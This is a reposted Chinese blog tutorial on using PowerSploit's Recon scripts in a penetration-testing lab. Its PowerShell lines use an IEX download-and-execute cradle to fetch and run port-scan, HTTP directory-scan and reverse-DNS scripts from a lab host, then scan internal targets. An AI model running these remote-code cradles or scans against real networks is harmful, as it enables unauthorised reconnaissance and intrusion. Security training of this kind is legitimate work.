POWERSPLOIT-Recon(信息侦察)脚本渗透实战
生活随笔
收集整理的這篇文章主要介紹了
POWERSPLOIT-Recon(信息侦察)脚本渗透实战
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
Recon(信息偵察)模塊
?
a) 調(diào)用invoke-Portscan掃描內(nèi)網(wǎng)主機(jī)的端口。
1)通過IEX下載并調(diào)用invoke-portscan。
PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke -Portscan.ps1")?
PS C:\Users\Administrator> Invoke-Portscan -Hosts 192.168.190.132 -Ports "1-65535"?
?
?
?
?
b) 調(diào)用Get-HttpStatus掃描目標(biāo)站點(diǎn)的目錄。
1)通過IEX下載并調(diào)用Get-HttpStatus。
?
PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Get-Ht tpStatus.ps1")?
?
PS C:\Users\Administrator> Get-HttpStatus -Target www.xxx.com -Path D:\dic.txt?
c) 調(diào)用Invoke-ReverseDnsLookup掃描內(nèi)網(wǎng)主機(jī)的ip對(duì)應(yīng)的主機(jī)名。
1)通過IEX下載并調(diào)用Invoke-ReverseDnsLookup。
PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke -ReverseDnsLookup.ps1") PS C:\Users\Administrator> Invoke-ReverseDnsLookup '192.168.190.133'?
?
?
?
?
?
?
?
?
轉(zhuǎn)載于:https://www.cnblogs.com/-qing-/p/10544271.html
創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎(jiǎng)勵(lì)來咯,堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎(jiǎng)總結(jié)
以上是生活随笔為你收集整理的POWERSPLOIT-Recon(信息侦察)脚本渗透实战的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 第一章 计算机、程序和Java概述 复习
- 下一篇: 导航守卫